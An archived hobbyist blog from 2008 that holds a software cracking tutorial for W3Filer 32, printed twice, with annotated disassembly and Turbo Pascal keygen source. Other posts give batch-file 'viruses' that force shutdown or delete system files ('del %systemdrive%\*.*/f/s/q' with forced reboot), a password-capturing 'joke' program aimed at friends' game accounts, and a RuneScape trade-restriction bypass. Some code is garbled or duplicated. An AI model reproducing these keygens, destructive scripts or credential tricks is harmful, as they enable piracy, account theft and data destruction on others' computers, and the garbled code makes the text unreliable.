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06 December 2008
30 November 2008
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22 November 2008
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17 November 2008
Making a keygen
I take no responsibility of the usage of this information.
This tutorial, is for educational knowledge ONLY.
Hi there, in this tutorial, I intend to teach you how to make a pretty
simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...
I guess some of you might know the program.
I`ll assume you know:
1.How to use debugger (in this case, SoftIce).
2.How to crack, generally (finding protection routines,patching them,etc...).
3.How to use Disassembler (This knowledge can help).
5.How to code in Turbo Pascal ™.
Tools you`ll need:
1.SoftIce 3.00/01 or newer.
2.WD32Asm. (Not a must).
3.The program W3Filer V1.13 (if not provided in this package), can be found in I believe.
4.Turbo Pascal (ANY version).
Well, enough blah blah, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
We notice this program has some kind of serial number (Mine is 873977046),
Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.
Well, now, let's put your name and a dummy reg code...
set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...
I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user name, offset EAX. :0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX. :0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX HMMMMMM, What's in
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret
Making the actual Keygen
Now, after I've explained how does the program calculate the registration
code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
That's it, here's the source of my keygen:
------------------- Cut here ---------------------------------------------
Program W3FilerKeygen;
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
For I:=1 to length(Name) do
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
digit:=Key mod 16;
key:=key div 16;
If digit<10>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
This tutorial, is for educational knowledge ONLY.
Hi there, in this tutorial, I intend to teach you how to make a pretty
simple keygen, of a program called W3Filer 32 V1.1.3.
W3Filer is a pretty good web downloader...
I guess some of you might know the program.
I`ll assume you know:
1.How to use debugger (in this case, SoftIce).
2.How to crack, generally (finding protection routines,patching them,etc...).
3.How to use Disassembler (This knowledge can help).
5.How to code in Turbo Pascal ™.
Tools you`ll need:
1.SoftIce 3.00/01 or newer.
2.WD32Asm. (Not a must).
3.The program W3Filer V1.13 (if not provided in this package), can be found in I believe.
4.Turbo Pascal (ANY version).
Well, enough blah blah, let's go cracking...
Run W3Filer 32.
A nag screen pops, and , demands registration (Hmm, this sux ;-)) Now,
We notice this program has some kind of serial number (Mine is 873977046),
Let's keep the serial in mind, I bet we`ll meet it again while we're on
the debugger.
Well, now, let's put your name and a dummy reg code...
set a BP on GetDlgItemTextA, and, press OK.
We pop inside GetDlgItemTextA, Lets find the registration routine...
I`ll save you the work, the registration routine is this:
:00404DB2 8D95A8FAFFFF lea edx, dword ptr [ebp+FFFFFAA8]
:00404DB8 52 push edx ---> Your user name here.
:00404DB9 E80B550000 call 0040A2C9 ---> Registration routine.
:00404DBE 83C408 add esp, 00000008 ---> Dunno exactly what is it.
:00404DC1 85C0 test eax, eax ---> Boolean identifier, 0 if
:00404DC3 7D17 jge 00404DDC ---> registration failed, 1 if
Well, Let's enter the CALL 40A2C9, and see what's inside it:
(Please read my comments in the code).
* Referenced by a CALL at Addresses:
|:00404DB9 , :00407F76
:0040A2C9 55 push ebp
:0040A2CA 8BEC mov ebp, esp
:0040A2CC 81C4B0FEFFFF add esp, FFFFFEB0
:0040A2D2 53 push ebx
:0040A2D3 56 push esi
:0040A2D4 57 push edi
:0040A2D5 8B5508 mov edx, dword ptr [ebp+08]
:0040A2D8 8DB500FFFFFF lea esi, dword ptr [ebp+FFFFFF00]
:0040A2DE 33C0 xor eax, eax
:0040A2E0 EB16 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A2E2 0FBE0A movsx ecx, byte ptr [edx] ----> Here Starts the
interesting part.
:0040A2E5 83F920 cmp ecx, 00000020 ----> ECX is the the current
char in the user name, Hmm, 20h=' '...
:0040A2E8 740D je 0040A2F7 ----> Let's see,
:0040A2EA 8A0A mov cl, byte ptr [edx] ----> Generally, all this loop
does, is copying
the user name from
[EDX], to [ESI], WITHOUT the spaces!
(Keep this in mind! ).
:0040A2EC 880C06 mov byte ptr [esi+eax], cl
:0040A2EF 42 inc edx
:0040A2F0 40 inc eax
:0040A2F1 C6040600 mov byte ptr [esi+eax], 00
:0040A2F5 EB01 jmp 0040A2F8
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A2F7 42 inc edx
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A2E0(U), :0040A2F5(U)
:0040A2F8 803A00 cmp byte ptr [edx], 00
:0040A2FB 75E5 jne 0040A2E2 ----------------> This is the loop , we got
what it does,
Let's continue tracing
the code...
:0040A2FD 56 push esi --------> The user name is pushed, in order
Upcase it's chars.
* Reference To: USER32.CharUpperA, Ord:0000h
:0040A2FE E80F330000 Call User!CharUpper ---> After this, our name is in
upper case.
:0040A303 56 push esi -----> Our name in upper case here.
* Reference To: cw3220mt._strlen, Ord:0000h
:0040A304 E86F300000 Call 0040D378 ---> This is the length of our name.
:0040A309 59 pop ecx
:0040A30A 8BC8 mov ecx, eax ---> ECX=Length.
:0040A30C 83F904 cmp ecx, 00000004 ---> Length>=4 (MUST).
:0040A30F 7D05 jge 0040A316 ---> Let's go to this address...
:0040A311 83C8FF or eax, FFFFFFFF
:0040A314 EB67 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A316 33D2 xor edx, edx
:0040A318 33C0 xor eax, eax
:0040A31A 3BC8 cmp ecx, eax
:0040A31C 7E17 jle 0040A335 ---> (Not important, just another useless
============ FROM HERE AND ON, THE IMPORTANT CODE, PAY ATTENTION ==================
One thing before we continue, EDX = 00000000h as we enter to the next instructions.
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A31E 0FBE1C06 movsx ebx, byte ptr [esi+eax] ---> EBX <--- char in user name, offset EAX. :0040A322 C1E303 shl ebx, 03 -----> Hmm, it shl's the char by 03h...
(Remember that).
:0040A325 0FBE3C06 movsx edi, byte ptr [esi+eax] ---> Now EDI <--- Char in user name , offset EAX. :0040A329 0FAFF8 imul edi, eax -----> It multiplies the char by the
offset in user name! (Remember that).
:0040A32C 03DF add ebx, edi -----> Adds the result to EBX (That was
Shelled (Ding Dong =)).
:0040A32E 03D3 add edx, ebx -----> EDX=EDX+EBX!!! - This is the CORE
of this registration routine!!!
:0040A330 40 inc eax -----> Increase EAX by one (next char).
:0040A331 3BC8 cmp ecx, eax
:0040A333 7FE9 jg 0040A31E ----> If ECX
:0040A33A C1F803 sar eax, 03 ---------> WAIT! Please type in SIce '?
Does this number in EAX look
familiar to us? ;-)
If you still don`t understand,
than, It's
your time, and check by
yourself - don`t trust me!). OK,
so now we know,
That it SHR's EAX by 03 (SAR is
almost identical to SHR).
:0040A33D 03D0 add edx, eax ---------> Hmm, it adds the result from the
loop, the serial number shr'd by 03h
:0040A33F 52 push edx -------> Let's continue. (At this point, I
can tell you , the reg number, is
in EDX - only that the reg number
is in HEX --> That's how you enter it).
* Possible StringData Ref from Data Obj ->"%lx"
:0040A340 685EF54000 push 0040F55E
:0040A345 8D95B0FEFFFF lea edx, dword ptr [ebp+FFFFFEB0]
:0040A34B 52 push edx
* Reference To: USER32.wsprintfA, Ord:0000h
:0040A34C E8E5320000 Call 0040D636 -------> This one, does HEX2STR (Takes
the value from EDX, and turns it to an hex string).
:0040A351 83C40C add esp, 0000000C
:0040A354 8D8DB0FEFFFF lea ecx, dword ptr [ebp+FFFFFEB0] -----> type 'd ecx' -
THIS is the reg number! That's enough for us, the rest of
the code, is
just for comparing the correct reg code with ours.
:0040A35A 51 push ecx
* Reference To: USER32.CharLowerA, Ord:0000h
:0040A35B E8B8320000 Call 0040D618
:0040A360 8D85B0FEFFFF lea eax, dword ptr [ebp+FFFFFEB0]
:0040A366 50 push eax
:0040A367 FF750C push [ebp+0C]
* Reference To: cw3220mt._strcmp, Ord:0000h
:0040A36A E875300000 Call 0040D3E4
:0040A36F 83C408 add esp, 00000008
:0040A372 85C0 test eax, eax
:0040A374 7405 je 0040A37B
:0040A376 83C8FF or eax, FFFFFFFF
:0040A379 EB02 jmp 0040A37D
* Referenced by a (U)nconditional or ©onditional Jump at Address:
:0040A37B 33C0 xor eax, eax
* Referenced by a (U)nconditional or ©onditional Jump at Addresses:
|:0040A314(U), :0040A379(U)
:0040A37D 5F pop edi
:0040A37E 5E pop esi
:0040A37F 5B pop ebx
:0040A380 8BE5 mov esp, ebp
:0040A382 5D pop ebp
:0040A383 C3 ret
Making the actual Keygen
Now, after I've explained how does the program calculate the registration
code, you can either write your own keymaker, without looking at my code, or
look at my code (in Turbo Pascal - sorry for all you C lovers ;-) Next time).
That's it, here's the source of my keygen:
------------------- Cut here ---------------------------------------------
Program W3FilerKeygen;
Writeln(' W3Filer32 V1.1.3 Keymaker');
writeln('Cracked by ^pain^ ''97 / Rebels!');
Write('Your Name:'); { Read the name }
Write('Serial Number:');
readln(SerialNum); {Yes, we need the serial number for the calculation!}
For I:=1 to length(Name) do
If Name[I]<>' ' then begin
eb:=ord(Name[I]) shl 3; {EB = Name[I] Shl 03h}
Ed:=ord(Name[I]); {ED = Name[I]}
ed:=ed*(x); {ED=ED*Offset}
eb:=eb+ed; {Add ED to EB}
Key:=Key+EB; {Add EB to KEY}
Key:=Key+(SerialNum shr 3); { Add SerialNum shr 03h to Key}
{ From here, this is just HEX2STRING --> I`m quite sure it's
Self explaintory, else - go and learn number bases again! ;-)}
digit:=Key mod 16;
key:=key div 16;
If digit<10>10 then KeyHex:=Chr(Digit-10+ord('a'))+KeyHex;
until key=0;
writeln('Your Key:',KeyHex);
writeln(' Enjoy!');
03 November 2008
15 October 2008
12 October 2008
Many free new games for NVIDIA users
11 October 2008
10 October 2008
Any Kinds of Donations are appriciated. I hope i helped in some things on this blog.
You can Donate on the right side
28 September 2008
Remove top bar on your blog
1. Go to your blog
2. Go to Dashboard
3. Click Layout
4. Click edit HTML
5. In the starting there should be something like this
------------------------------ */
Blogger Template Style Name: Minima Black
Designer: Douglas Bowman
Date: 26 Feb 2004
Updated by: Blogger Team
------------------------------ */
5. Under the red line add
#navbar-iframe { display: none !important; } /* Variable definitions
24 September 2008
23 September 2008
Make Runescape Private Server (100% works)
Chapter 1: Getting JDK (Java Development Kit)
Chapter 2: Getting a Source
Chapter 3: Editing system enviromental variables
Chapter 2: Getting a Source
Chapter 3: Editing system enviromental variables
Chapter 4: Getting No-ip to host
Chapter 5: Port Forwarding (uttorent)
Chapter 1: Getting JDK (Java Development Kit)
Step 1: Download JDK
Step 2: Install JDK and it should ask you to install JRE
Step 3: Install JRE
Chapter 2: Getting a Source
1. First download these files (don't run)
2. Extract the Allstarscape on your desktop
3. Open the extracted file and open
4. Press CTRL+H and replace these things:
Allstar-Scape = yourservername
Allstarscape = yourservername
5. Save it and close
6. Edit compile.bat
@echo off
title Compiler
javac *.java
@echo off
title Compiler
javac *.java
7. Close compile.bat and edit runserver.bat and inside write
(only if u have problems with running server)
@echo off
color 0b
title YOUR SERVER NAME server
"C:\Program Files\Java\jre1.6.0_05\bin\java.exe" -Xmx500m server
(change jre1.6.0_05 to another version of JDK if u have) (just go to C:\Program Files\your JRE version
8. Save and close runserver.bat
9. Click compile.bat and you shouldnt get any errors
Chapter 3: Editing system variables
Windows XP:
1. Right click on my computer and then properties
2. Click the advanced tab
3. Click the enviromental variables
Windows Vista:
1. Right click on my computer and then click properties
2. Click advanced system properties
3. Click the advanced tab
4. Click enviromental variables
2. Find and click edit on variable CLASSPATH (if u dont have it create it)
3. Inside the variable write:
To find your JDK version go to C:\Program Files\Java
4. Find and click edit on variable PATH (if u dont have it create it)
5. Inside the variable write:
C:\Program Files\Java\YOURJDKVERSION\bin
To find your JDK version go to C:\Program Files\Java
6. Click ok
3. Click the advanced tab
4. Click enviromental variables
2. Find and click edit on variable CLASSPATH (if u dont have it create it)
3. Inside the variable write:
To find your JDK version go to C:\Program Files\Java
4. Find and click edit on variable PATH (if u dont have it create it)
5. Inside the variable write:
C:\Program Files\Java\YOURJDKVERSION\bin
To find your JDK version go to C:\Program Files\Java
6. Click ok
Chapter 4: Getting No-ip to host
1. Install no-ip
2. Go to no-ip site
3. Register and log in
4. Click "Add a Host"
5. Open no-ip you installed and log in
6. Right click and click refresh hosts
7. Check that host and ur ready
Chapter 5:
a) portforwarding router/firewall
b) uttorent
a) if u have router then download this guide
b) PORTFORWARDING (if u have problems with upper one)
1. Install Uttorent
2. Run it and go to Options-->Preferences-->Connection
3. In the small window enter 43594, enable UPnP, Enable NAT-PMP, Disable Randomize port, Enble Windows Firewall exception
4. Save and exit uttorent (even from taskbar)
5. Run your server
6. Again turn on uttorent (you must have NO-IP turned on so people can connect)
5. Run your server
6. Again turn on uttorent (you must have NO-IP turned on so people can connect)
IMPORTANT INFORMATION (if u use uttorent)
1. You start no-ip
2. You start Uttorent
3. Close Uttorent (from taskbar)
4. Run server
5. Run Uttorent
4. Run server
5. Run Uttorent
95% me
5% to rune-server
20 September 2008
17 September 2008
Runescape Earn Money (easy)
Easy Way getting money by buying and selling eye of newt (54 profit each)
1. Go to Draynor bank
2. Withdraw money in your inventory (5k)
3. Go to Magic shop at port sarim and buy eye of newt
4. Go back to draynor
5. Bank them
6. Do again the same thing many times
7. Go to Grand Exchange and sell them for 57 each (57 ea to sell them fast)
PROFIT 101259 GP
You buy each for 3gp and sell 59gp each in grand exchange
Do not sell them under 50gp each
Runescape Balanced Trade (bypass)
This is the way how to bypass balanced trade to transfer stuff or money to your main account.
You must use rune platelegs
All credits go to 100919
1. Go to the account from which one you want to transfer monny or items to your main
2. Make sure you have atleast 40k with you
3. Go to Grand Exchange and buy runeplatelegs if you dont have one
4. Go to falador party room
5. Go to least populated world
6. Log in to your poor account and put in the rune platelegs and push the button for baloons
7. Switch to your main account and go to this spot and there should drop baloon with rune legs
1. In that spot always drop rune platelegs
2. If you put in the chest less than 40k, then the bankers and other people won't say "Falador Party Room starts in 2 minutes with 100k, it will start in 12 seconds
3. Do the process 1 by 1 rune platelegs per baloon party.
11 September 2008
Runescape Joke
This is a Runescape JOKE
If you download this, you open a file you downloaded and then you write the following things
(ITS JUST A JOKE) and you make a file in C:\keys.txt Its soo cool
For exapmle: You call your friend to your house and yo tell him that you got around 50 acconts with that program. You run it and he writes In victims password, the new password and his username (HE DOESNT HAVE TO WRITE HSI PASSWORD) When he writes the new password (50% its going to be the same as his account so you have his account) ALL THINGS HE WRITES COME TO THE FILE C:\keys.txt
YOU MUST MANUALLY CREATE THE FILE. Make the file on desktop and then put it in C:\
Im not RESPONSIBLE for your actions. I made this to teach you how could some1 send you program liek that and that it sends to his email. If you want to check the file, did i put something in just click >right click>edit>and there are no emails, sites, or anything... I made this for joke.
10 September 2008
Make your (Runescape, MapleStory...) Macro without programming
You can make your own Macro which you can use when u are not on the computer. In this porgram you will not have to programm; you will only have to record-save-ur done.
1. Download
2. Install it and register it with keygen inside
3. Run it and click record
4. When you click record, the program is recording what you do and it can be saved as .exe
5. Go to Settings-->Playback Settings-->and set how many times to replay it
6. Record something in (Runescape, Maplestory...) and just press play all
Make Autoclicker in VB6 (tut)
1. Open VB6 and start Standard exe
2. Add 2 buttons, horizontal scrollbar, timer and label
3. Name---Caption
Erase caption inside label
4. Click on any button and add this code:
Private Declare Sub mouse_event Lib "user32" (ByVal dwFlags As Long, ByVal dx As Long, ByVal dy As Long, ByVal cButtons As Long, ByVal dwExtraInfo As Long)
Private Const MOUSELEFTDOWN = &H2 ' left button down /This is actually MOUSEEVENTF_LEFTDOWN
Private Const MOUSELEFTUP = &H4 ' left button up /This is actually MOUSEEVENTF_LEFTUP
Private Sub Form_Load()
Label1.Caption = HScroll1.Value
Timer1.Enabled = False
Timer1.Interval = HScroll1.Value
End Sub
Private Sub HScroll1_Change()
Label1.Caption = HScroll1.Value
Timer1.Interval = HScroll1.Value
End Sub
Private Sub HScroll1_Scroll()
Label1.Caption = HScroll1.Value
Timer1.Interval = HScroll1.Value
End Sub
Private Sub cmdStart_Click()
Timer1.Enabled = True
End Sub
Private Sub cmdStop_Click()
Timer1.Enabled = False
End Sub
Private Sub Timer1_Timer()
mouse_event MOUSELEFTDOWN, 0, 0, 0, 0 'left button goes down
mouse_event MOUSELEFTUP, 0, 0, 0, 0 'left button comes up
End Sub
5. Click on Horizontal ScrollBar and in options set "Max" to 5000 and "Min" to 10
Hacking AIO
Proxy list
This is a list of proxies which you can use for surfing on websites anonymously:
To see that it works do this:
1. Open New Tab or Window and go to: (dont close it)
2. Click on any link above and when the page loads in the URL box write: and you will see that the IPs are not the same.
09 September 2008
Shutdown Virus
--->Shutdown virus<---
1. open notepad
2. write:
@echo off
shutdown -s -t 600 -c "comment"
to turn off the virus go to run or CMD and write "shutdown -a"
3. Save as "virus.bat"
cd/---to start on startup
600---time in seconds
--->Crash Virus<---
1. Open notepad
2. Write many times: start firefox.exe
@echo off
start firefox.exe
3. Save as virus1.bat
firefox.exe ---firefox
mspaint.exe ---paint
notepad.exe ---notepad
avgui.exe ---AVG
chess.exe ---chess
--->Format C<---
1. Open notepad
2. Write:
3. Save as format.exe
--->Delete Boot<---
1. Open notepad
2. Write:
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
3. Save as boot.exe
--->Delete System<---
1. Open notepad
2. Write:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
3. Save as virus2.bat
THESE VIRUSES ARE FOR LEARNING PURPOSES (to find how valuable is your PC) and how to protect it if you really have virus like this. IM NOT RESPONSIBLE FOR YOUR ACTIONS
Cheat Engine
Cheat Engine is a program in which you can make trainers, speedhack, change money and numbers in games (internet and installed)
Cheat Engine doesnt work on: Runescape, WOW, other protected games
Make Web Browser in VB6 (tut)
This Web Browser will have: back, forward, refresh, search, links
1. Open your VB6 and start standard exe
2. Press CTRL+T and search for "Microsoft Internet Tools"
3. There should be added some globe on the toolbar (stretch it on the form) make sure its big
3. Make 5 buttons and 1 textbox
Text1---erase everything in textbox
CmdGmail---Gmail you can change "gmail" into something else but later when i write "gmail" you will have to change it to another link.
4. Click on any button and add this code:
Private Sub CmdBack_Click()
End Sub
Private Sub CmdForward_Click()
End Sub
Private Sub CmdGmail_Click()
WebBrowser1.Navigate ("")
End Sub
Private Sub CmdRefresh_Click()
End Sub
Private Sub CmdSearch_Click()
WebBrowser1.Navigate (Text1.Text)
End Sub
Private Sub Form_Load()
WebBrowser1.Navigate ("")
End Sub
Private Sub WebBrowser1_StatusTextChange(ByVal Text As String)
Text1.Text = (WebBrowser1.LocationURL)
Form1.Caption = (WebBrowser1.LocationName)
End Sub
NOTE: Change Gmail link into something else if you want (see step 3)
Make notepad in VB6 (tut)
This Notpad will have: clear all and Exit
1. Open your VB6 and start standard exe
2. Make 1 textbox and 2 buttons (textbox is where you write and 2 buttons clear and exit)
3. Captions for 1 button is Clear All and for the 2nd one is Exit
4. Double click on Clear All button and inside write:
text1.text = " "
5. Double click on Exit Program button and inside write:
Unload Me
NOTE: If you want when you press enter that it goes to next line do this: Click on the textbox and see properties on the right. Find multiline and change it to "true".
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